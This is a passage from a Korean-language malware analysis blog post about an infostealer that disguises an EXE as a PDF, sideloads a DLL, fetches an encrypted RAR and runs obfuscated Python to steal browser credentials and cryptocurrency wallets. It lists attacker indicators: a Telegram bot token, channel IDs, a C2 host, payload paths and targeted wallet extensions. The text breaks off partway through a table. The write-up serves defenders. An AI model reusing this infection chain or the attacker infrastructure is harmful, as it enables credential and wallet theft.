&lt;p data-ke-size=&quot;size16&quot;&gt;압축 파일에 포함된&lt;span&gt; &amp;ldquo;&lt;/span&gt;조사에서 확인된 결과&lt;span&gt;.exe&amp;rdquo; &lt;/span&gt;파일은&lt;span&gt; PDF &lt;/span&gt;문서로 위장한&lt;span&gt; EXE &lt;/span&gt;파일로&lt;span&gt;, &lt;/span&gt;정상&lt;span&gt; Adobe &lt;/span&gt;파일&lt;span&gt;(ADNotificationManager.exe)&lt;/span&gt;입니다&lt;span&gt;. &lt;/span&gt;해당 파일 실행 시 동일 경로에 숨겨진&lt;span&gt; DLL&lt;/span&gt;이 사이드로딩으로 동작됩니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;463&quot; data-origin-height=&quot;288&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/btTQv9/dJMb99ThL0d/Fq07qg3JVCZIwqwFoFICG0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/btTQv9/dJMb99ThL0d/Fq07qg3JVCZIwqwFoFICG0/img.png&quot; data-alt=&quot;[그림 5] &amp;amp;ldquo; 조사에서 확인된 결과.exe&amp;amp;rdquo; 파일 정보&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/btTQv9/dJMb99ThL0d/Fq07qg3JVCZIwqwFoFICG0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbtTQv9%2FdJMb99ThL0d%2FFq07qg3JVCZIwqwFoFICG0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;463&quot; height=&quot;288&quot; data-origin-width=&quot;463&quot; data-origin-height=&quot;288&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 5] &amp;ldquo; 조사에서 확인된 결과.exe&amp;rdquo; 파일 정보&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;로드된&lt;span&gt; DLL&lt;/span&gt;중&lt;span&gt; urlmon.dll&lt;/span&gt;은 다음과 같은 명령어를 통해&lt;span&gt; &amp;ldquo;Invoice.pdf&amp;rdquo; &lt;/span&gt;파일을 다운로드를 진행합니다&lt;span&gt;. &lt;/span&gt;다운로드된 파일은 암호화된&lt;span&gt; RAR &lt;/span&gt;압축 파일이며&lt;span&gt;, &amp;ldquo;&lt;/span&gt;부가가치세 영수증&lt;span&gt;.jpg&amp;rdquo;(&lt;/span&gt;정상&lt;span&gt; WinRAR.exe) &lt;/span&gt;파일을 이용해서&lt;span&gt; &amp;ldquo;C:\Users\Public&amp;rdquo;&lt;/span&gt;폴더에 압축을 해제합니다&lt;span&gt;. &lt;/span&gt;이때 압축 해제 암호는&lt;span&gt; &amp;ldquo;GSE3yM1tHno0DdW9BmIsSW9pnINo36ZZ&amp;rdquo; &lt;/span&gt;이며&lt;span&gt;, &lt;/span&gt;이후&lt;span&gt; &amp;ldquo;Invoice.pdf&amp;rdquo;, &amp;ldquo;&lt;/span&gt;부가가치세 영수증&lt;span&gt;.jpg&amp;rdquo; &lt;/span&gt;두 파일을 삭제해 흔적을 지우고&lt;span&gt;, &amp;ldquo;Invoice.pdf&amp;rdquo; &lt;/span&gt;내&lt;span&gt; &amp;ldquo;svchost.exe&amp;rdquo; &lt;/span&gt;파일을 이용해&lt;span&gt; &amp;ldquo;py.ico&amp;rdquo; &lt;/span&gt;파일을 실행합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;787&quot; data-origin-height=&quot;193&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cCWu4L/dJMcagSqGl8/UvdyuqunKhbT16AxYVzz31/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cCWu4L/dJMcagSqGl8/UvdyuqunKhbT16AxYVzz31/img.png&quot; data-alt=&quot;[그림 6] urlmon.dll 로드 시 실행되는 명령어&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cCWu4L/dJMcagSqGl8/UvdyuqunKhbT16AxYVzz31/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcCWu4L%2FdJMcagSqGl8%2FUvdyuqunKhbT16AxYVzz31%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;787&quot; height=&quot;193&quot; data-origin-width=&quot;787&quot; data-origin-height=&quot;193&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 6] urlmon.dll 로드 시 실행되는 명령어&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;761&quot; data-origin-height=&quot;135&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/rdnH4/dJMcaiiocZW/S815l2OdXNe3JfIfWuod9K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/rdnH4/dJMcaiiocZW/S815l2OdXNe3JfIfWuod9K/img.png&quot; data-alt=&quot;[그림 7] &amp;amp;ldquo; 부가가치세 영수증.jpg&amp;amp;rdquo; 파일 정보&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/rdnH4/dJMcaiiocZW/S815l2OdXNe3JfIfWuod9K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FrdnH4%2FdJMcaiiocZW%2FS815l2OdXNe3JfIfWuod9K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;761&quot; height=&quot;135&quot; data-origin-width=&quot;761&quot; data-origin-height=&quot;135&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 7] &amp;ldquo; 부가가치세 영수증.jpg&amp;rdquo; 파일 정보&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;ldquo;&lt;span&gt;Invoice.pdf&amp;rdquo; &lt;/span&gt;파일은&lt;span&gt; Python &lt;/span&gt;버전&lt;span&gt; 3.10&lt;/span&gt;의 런타임 및 악성 스크립트를 포함하고 있으며&lt;span&gt;, &lt;/span&gt;정상&lt;span&gt; &amp;ldquo;python.exe&amp;rdquo; &lt;/span&gt;파일을&lt;span&gt; &amp;ldquo;svchost.exe&amp;rdquo; &lt;/span&gt;로 위장하여&lt;span&gt; py.ico(&lt;/span&gt;악성 스크립트&lt;span&gt;)&lt;/span&gt;를 실행합니다&lt;span&gt;. &lt;/span&gt;실행 시&lt;span&gt; &amp;ldquo;MRB_2_NEW_VER_BOT&amp;rdquo; &lt;/span&gt;값을 실행 인자로 사용합니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;612&quot; data-origin-height=&quot;160&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Lh77z/dJMcaiQbRWt/aHkBurfD0f62F4HFPwxk41/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Lh77z/dJMcaiQbRWt/aHkBurfD0f62F4HFPwxk41/img.png&quot; data-alt=&quot;[그림 8] Invoice.pdf 압축해제 이후 파일 목록&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Lh77z/dJMcaiQbRWt/aHkBurfD0f62F4HFPwxk41/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FLh77z%2FdJMcaiQbRWt%2FaHkBurfD0f62F4HFPwxk41%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;612&quot; height=&quot;160&quot; data-origin-width=&quot;612&quot; data-origin-height=&quot;160&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 8] Invoice.pdf 압축해제 이후 파일 목록&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2.2) &lt;/span&gt;추가 다운로드 파일&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;py.ico &lt;/span&gt;파일은&lt;span&gt; python &lt;/span&gt;난독화 스크립트로&lt;span&gt;, &lt;/span&gt;실행 시 다음과 같은 흐름으로 코드가 실행됩니다&lt;span&gt;.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;실행 흐름&lt;br /&gt;Base85&amp;nbsp;&amp;rarr; BZ2 &lt;span style=&quot;letter-spacing: 0px;&quot;&gt;압축 해제&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &amp;rarr; Zlib &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;압축 해제&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &amp;rarr; Marshal &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;로드&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &amp;rarr;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;생성된 바이트 코드 실행&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;879&quot; data-origin-height=&quot;755&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bw8Xa2/dJMcabp37xm/cHp4nU7YnKdaDDK9aWKK0K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bw8Xa2/dJMcabp37xm/cHp4nU7YnKdaDDK9aWKK0K/img.png&quot; data-alt=&quot;[그림 9] py.ico 코드 일부&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bw8Xa2/dJMcabp37xm/cHp4nU7YnKdaDDK9aWKK0K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbw8Xa2%2FdJMcabp37xm%2FcHp4nU7YnKdaDDK9aWKK0K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;879&quot; height=&quot;755&quot; data-origin-width=&quot;879&quot; data-origin-height=&quot;755&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 9] py.ico 코드 일부&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;바이트 코드가 실행되면&lt;span&gt;, &lt;/span&gt;우선 실행 인자로 전달받은 값&lt;span&gt;(&amp;ldquo;MRB_2_NEW_VER_BOT&amp;rdquo;)&lt;/span&gt;을&lt;span&gt; Telegram Bot ID&lt;/span&gt;로 설정하여&lt;span&gt; Request &lt;/span&gt;요청&lt;span&gt;(&amp;ldquo;t.me/MRB_2_NEW_VER_BOT&amp;rdquo;)&lt;/span&gt;을 진행합니다&lt;span&gt;. &lt;/span&gt;해당 페이지에 접근하게 되면&lt;span&gt; HTML &lt;/span&gt;메타 태그&lt;span&gt; &amp;ldquo;og:description&amp;ldquo;&lt;/span&gt;의&lt;span&gt; content &lt;/span&gt;값을 파싱하여 특정&lt;span&gt;ID&lt;/span&gt;값을 가져오게 되며&lt;span&gt;, &lt;/span&gt;해당&lt;span&gt; ID&lt;/span&gt;를 통해&lt;span&gt; urlvanish.com/{ID}&lt;/span&gt;을 접근 후 다음 주소로 리다이렉션됩니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;리다이렉션 URL: &lt;br /&gt;hxxps://mongky68.godohosting[.]com/detail/nonlocal/23summer/PA/PA?referer=urlvanish.com%2Ffe44f1ba&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;437&quot; data-origin-height=&quot;325&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cq0UEW/dJMb99Z5Hte/uSGYoy0xbpJk5Om4B3IA1K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cq0UEW/dJMb99Z5Hte/uSGYoy0xbpJk5Om4B3IA1K/img.png&quot; data-alt=&quot;[그림 10] Telegram 에서 수신한 ID&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cq0UEW/dJMb99Z5Hte/uSGYoy0xbpJk5Om4B3IA1K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcq0UEW%2FdJMb99Z5Hte%2FuSGYoy0xbpJk5Om4B3IA1K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;437&quot; height=&quot;325&quot; data-origin-width=&quot;437&quot; data-origin-height=&quot;325&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 10] Telegram 에서 수신한 ID&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2.3) fe44f1ba &lt;/span&gt;분석&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;C2 &lt;/span&gt;서버에서 추가로 다운받은&lt;span&gt; fe44f1ba &lt;/span&gt;파일은&lt;span&gt; py.ico &lt;/span&gt;파일과 동일한 방식으로 난독화가 되어 있는&lt;span&gt; python &lt;/span&gt;스크립트이고&lt;span&gt;, &lt;/span&gt;최종적으로 생성된 바이트 코드를 실행합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실행되는 바이트 코드의 문자열을 추출하여 확인한 결과&lt;span&gt;, &lt;/span&gt;브라우저 자격 증명 관련 정보와 암호화폐 지갑을 수집하고&lt;span&gt;, C2 &lt;/span&gt;서버로 전송합니다&lt;span&gt;. &lt;/span&gt;이후 추가 파일을 다운로드하고 실행해 추가 데이터 유출을 하는 것으로 추정됩니다&lt;span&gt;. &lt;/span&gt;해당 파일의 문자열 추출 정보는 다음과 같습니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 31.5891%; text-align: center;&quot;&gt;항목&lt;/td&gt;
&lt;td style=&quot;width: 32.9845%; text-align: center;&quot;&gt;상세 문자열&lt;/td&gt;
&lt;td style=&quot;width: 35.4263%; text-align: center;&quot;&gt;설명&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 31.5891%;&quot;&gt;&lt;span&gt;Telegram Bot Token&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 32.9845%;&quot;&gt;&lt;span&gt;7755709066:AAExjVy6cxqr-6wprm2w3gqyAXSL7LfmwEE&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 35.4263%;&quot;&gt;&lt;span&gt;Telegram API &lt;/span&gt;&lt;span&gt;통신을 위한 고유 토큰&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 31.5891%;&quot;&gt;&lt;span&gt;Telegram Channel&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 32.9845%;&quot;&gt;&lt;span&gt;-1003147990191, &lt;br /&gt;-1002804802878, &lt;br /&gt;-1003188277781&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 35.4263%;&quot;&gt;&lt;span&gt;로그 수집&lt;span&gt;, &lt;/span&gt;감염 알림&lt;span&gt;, &lt;/span&gt;데이터 유출 채널&lt;span&gt; ID&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 31.5891%;&quot;&gt;&lt;span&gt;C2 Server Host&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 32.9845%;&quot;&gt;hxxp://mongky68.godohosting[.]com&lt;/td&gt;
&lt;td style=&quot;width: 35.4263%;&quot;&gt;&lt;span&gt;악성파일 유포지 &lt;span&gt;(&lt;/span&gt;국내 웹 호스팅 서비스 악용&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 31.5891%;&quot;&gt;&lt;span&gt;추가 다운로드&lt;span&gt; Path&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 32.9845%;&quot;&gt;&lt;span&gt;/detail/nonlocal/23summer/ABE, &lt;br /&gt;/detail/nonlocal/23summer/clip, &lt;br /&gt;/detail/nonlocal/23summer/PA/pure&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 35.4263%;&quot;&gt;&lt;span&gt;추가 페이로드 다운로드 경로&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 1] &lt;span&gt;C2 &lt;/span&gt;&lt;span&gt;통신 관련 문자열&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 51px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 12.3256%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;분류&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 48.9535%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;상세 문자열&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 13.7209%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;탈취 정보&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 12.3256%;&quot;&gt;&lt;span&gt;주요 브라우저&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 48.9535%;&quot;&gt;&lt;span&gt;Naver Whale, Chrome, Edge, Brave, Firefox, Opera, Opera GX, Opera Crypto, Vivaldi&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 13.7209%;&quot; rowspan=&quot;3&quot;&gt;&lt;span&gt;Login Data, Cookies, &lt;br /&gt;Web &lt;b&gt;Data&lt;/b&gt;, HIstory&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 12.3256%; height: 17px;&quot;&gt;&lt;span&gt;기타 브라우저&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 48.9535%; height: 17px;&quot;&gt;&lt;span&gt;Thorium, Iridium, Epic, Dragon, CocCoc, Yandex, Slimjet, U-R Browser, Arc, Aloha, CryptoTab, Cent, Chedot, 360Browser&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 12.3256%; height: 17px;&quot;&gt;&lt;span&gt;시스템 정보&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 48.9535%; height: 17px;&quot;&gt;&lt;span&gt;Local State, os_crypt, encrypted_key, login_db, cookie_db&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 2] 브라우저 관련 문자열&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 148px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 15.4651%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;분류&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 84.5349%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;대상 도메인&lt;span&gt; (URL)&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 15.4651%; height: 21px;&quot;&gt;&lt;span&gt;국내 거래소&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 84.5349%; height: 21px;&quot;&gt;&lt;span&gt;`upbit.com`, `korbit.co.kr`, `coinone.co.kr`, `gopax.co.kr`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 51px;&quot;&gt;
&lt;td style=&quot;width: 15.4651%; height: 51px;&quot;&gt;&lt;span&gt;해외 거래소&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 84.5349%; height: 51px;&quot;&gt;&lt;span&gt;`binance.com`, `coinbase.com`, `okx.com`, `bybit.com`, `bitget.com`, `mexc.com`, `htx.com`, `kucoin.com`, `kraken.com`, `bitfinex.com`, `bingx.com`, `bitmart.com`, `lbank.com`, `xt.com`, `bitunix.com`, `probit.com`, `huobi.com`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 34px;&quot;&gt;
&lt;td style=&quot;width: 15.4651%; height: 34px;&quot;&gt;&lt;span&gt;지갑&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 84.5349%; height: 34px;&quot;&gt;&lt;span&gt;`exodus.com`, `hyperliquid.xyz`, `electrum.org`, `coinomi.co.nl`, `bitgo.com`, `paypal.com`, `crypto.com`, `nami.exchange`, `whitebit.com`, `gate.com`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 15.4651%; height: 21px;&quot;&gt;&lt;span&gt;광고 계정&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 84.5349%; height: 21px;&quot;&gt;&lt;span&gt;`ads.google.com`, `business.facebook.com`, `adsmanager.facebook.com`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 3] &lt;span&gt;암호화폐 관련 문자열&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 157px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 50.1163%; height: 21px; text-align: center;&quot;&gt;지갑 명칭&lt;/td&gt;
&lt;td style=&quot;width: 49.8837%; height: 21px; text-align: center;&quot;&gt;&lt;span&gt;확장 프로그램&lt;span&gt; ID&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 34px;&quot;&gt;
&lt;td style=&quot;width: 50.1163%; height: 34px; text-align: center;&quot;&gt;&lt;span&gt;MetaMask&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 49.8837%; height: 34px; text-align: center;&quot;&gt;&lt;span&gt;`nkbihfbeogaeaoehlefnkodbefgpgknn`, &lt;br /&gt;`djclckkglechooblngghdinmeemkbgci`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 34px;&quot;&gt;
&lt;td style=&quot;width: 50.1163%; height: 34px; text-align: center;&quot;&gt;&lt;span&gt;Ronin Wallet&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 49.8837%; height: 34px; text-align: center;&quot;&gt;&lt;span&gt;`fnjhmkhhmkbjkkabndcnnogagogbneec`, &lt;br /&gt;`kjmoohlgokccodicjjfebfomlbljgfhk`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 50.1163%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;TronLink&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 49.8837%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;`ibnejdfjmmkpcnlpebklmnkoeoihofec`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 50.1163%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;Binance Wallet&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 49.8837%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;`fhbohimaelbohpjbbldcngcnapndodjp`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 50.1163%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;OKX Wallet&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 49.8837%; height: 17px; text-align: center;&quot;&gt;&lt;span&gt;`mcohilncbfahbmgdjkbpemcciiolgcge`&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
